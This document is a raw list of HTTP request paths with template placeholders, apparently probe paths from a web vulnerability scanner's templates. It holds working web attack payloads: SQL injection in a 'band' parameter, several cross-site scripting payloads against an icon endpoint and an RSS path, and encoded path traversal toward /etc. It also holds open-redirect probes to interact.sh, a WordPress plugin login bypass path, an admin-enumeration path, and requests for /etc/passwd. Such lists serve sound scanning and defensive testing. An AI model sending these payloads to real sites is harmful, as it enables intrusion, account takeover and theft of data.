/signin
/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
/api/modular-connector/login/{{string}}?origin=mo&type=foo
/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/adminer.php
/editor.php
/adminer/
/api/backup

/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}
/wp-json/mrm/v1/wp/admins?term=@
/api/status
/api/setup-complete
/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh
/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh
/api/4/system
/api/4/processlist
/api/4/config
/api/v1/monitor/messages
/web/%2Finteract.sh:443
/application/default
/application/..%2F..%2F..%2F..%2F..%2Fetc
/application/..%2F..%2F..%2F..%2F..%2Fetc/main
/application/..%252F..%252F..%252F..%252F..%252Fetc
/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc
/
{{pagepath}}
/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings
/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E<script>alert(document.domain)</script><text%3E
/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Cimage%20href%3Dx%20onerror%3Dalert(document.domain)%3E%3C%2Fimage%3E%3Ctext%3E
/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E
/api/system/version
/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca%3E%3Canimate+attributeName%3D%22href%22+values%3D%22javascript%3Aalert%28document.domain%29%22+begin%3D%220s%22+fill%3D%22freeze%22%2F%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue
/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null
/ghost/api/content/tags/?key={{api_key}}&filter=slug:[
/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca+href%3D%22java%26%239%3Bscript%3Aalert%28document.domain%29%22%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue
/wp-content/plugins/media-library-assistant/readme.txt
/etc/passwd
